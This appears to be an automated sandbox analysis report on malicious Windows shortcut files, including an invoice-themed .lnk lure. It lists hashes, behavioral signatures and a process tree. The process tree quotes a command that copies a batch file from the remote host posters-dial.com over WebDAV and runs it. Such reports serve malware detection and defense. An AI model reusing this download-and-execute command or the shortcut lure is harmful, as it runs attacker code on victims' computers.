Overview
overview
10Static
static
1$RECYCLE.B...2Y.lnk
windows7-x64
3$RECYCLE.B...2Y.lnk
windows10-2004-x64
3$RECYCLE.B...CZ.url
windows7-x64
1$RECYCLE.B...CZ.url
windows10-2004-x64
1$RECYCLE.B...JO.url
windows7-x64
1$RECYCLE.B...JO.url
windows10-2004-x64
1$RECYCLE.B...G6.lnk
windows7-x64
3$RECYCLE.B...G6.lnk
windows10-2004-x64
3$RECYCLE.B...O0.cmd
windows7-x64
1$RECYCLE.B...O0.cmd
windows10-2004-x64
1$RECYCLE.B...2Y.lnk
windows7-x64
3$RECYCLE.B...2Y.lnk
windows10-2004-x64
3$RECYCLE.B...CZ.url
windows7-x64
1$RECYCLE.B...CZ.url
windows10-2004-x64
1$RECYCLE.B...JO.url
windows7-x64
1$RECYCLE.B...JO.url
windows10-2004-x64
1$RECYCLE.B...G6.lnk
windows7-x64
3$RECYCLE.B...G6.lnk
windows10-2004-x64
3$RECYCLE.B...O0.cmd
windows7-x64
1$RECYCLE.B...O0.cmd
windows10-2004-x64
10INVOICE#BU...03.lnk
windows7-x64
3INVOICE#BU...03.lnk
windows10-2004-x64
7zay/dial.lnk
windows7-x64
3zay/dial.lnk
windows10-2004-x64
7Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25-03-2024 14:35
Static task
static1
Behavioral task
behavioral1
Sample
$RECYCLE.BIN/$I47GN2Y.lnk
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
$RECYCLE.BIN/$I47GN2Y.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
$RECYCLE.BIN/$I6AKHCZ.url
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$RECYCLE.BIN/$I6AKHCZ.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
$RECYCLE.BIN/$I9BVFJO.url
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$RECYCLE.BIN/$I9BVFJO.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
$RECYCLE.BIN/$IAEXCG6.lnk
Resource
win7-20240319-en
Behavioral task
behavioral8
Sample
$RECYCLE.BIN/$IAEXCG6.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
$RECYCLE.BIN/$IAH62O0.cmd
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
$RECYCLE.BIN/$IAH62O0.cmd
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
$RECYCLE.BIN/$R47GN2Y.lnk
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
$RECYCLE.BIN/$R47GN2Y.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
$RECYCLE.BIN/$R6AKHCZ.url
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
$RECYCLE.BIN/$R6AKHCZ.url
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
$RECYCLE.BIN/$R9BVFJO.url
Resource
win7-20240215-en
Behavioral task
behavioral16
Sample
$RECYCLE.BIN/$R9BVFJO.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
$RECYCLE.BIN/$RAEXCG6.lnk
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
$RECYCLE.BIN/$RAEXCG6.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
$RECYCLE.BIN/$RAH62O0.cmd
Resource
win7-20240319-en
Behavioral task
behavioral20
Sample
$RECYCLE.BIN/$RAH62O0.cmd
Resource
win10v2004-20240226-en
Behavioral task
behavioral21
Sample
INVOICE#BUSAPOMKDS03.lnk
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
INVOICE#BUSAPOMKDS03.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
zay/dial.lnk
Resource
win7-20240215-en
Behavioral task
behavioral24
Sample
zay/dial.lnk
Resource
win10v2004-20240226-en
General
-
Target
zay/dial.lnk
-
Size
1KB
-
MD5
5b83c1fdd1febf3b68aa9a27486a31dc
-
SHA1
06376481bcfbac7435e503e430c971064253d73c
-
SHA256
71388b3505194a6a338b4a5ec1d2054ebdffa2c96f23174740577c0f5be19d4b
-
SHA512
7888d314bf385d6f679f9b33af9dda9a34e16beb512288b312ad34f2c0403091f819d9a55c511737f977f3b93cc616a89a78cf3825244972a6f550218e22f622
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
cmd.exedescription pid process target process PID 4364 wrote to memory of 4648 4364 cmd.exe cmd.exe PID 4364 wrote to memory of 4648 4364 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\zay\dial.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "\\posters-dial.com@80\google\file.bat" "C:\Users\Admin\Music\file.bat" && "C:\Users\Admin\Music\file.bat"2⤵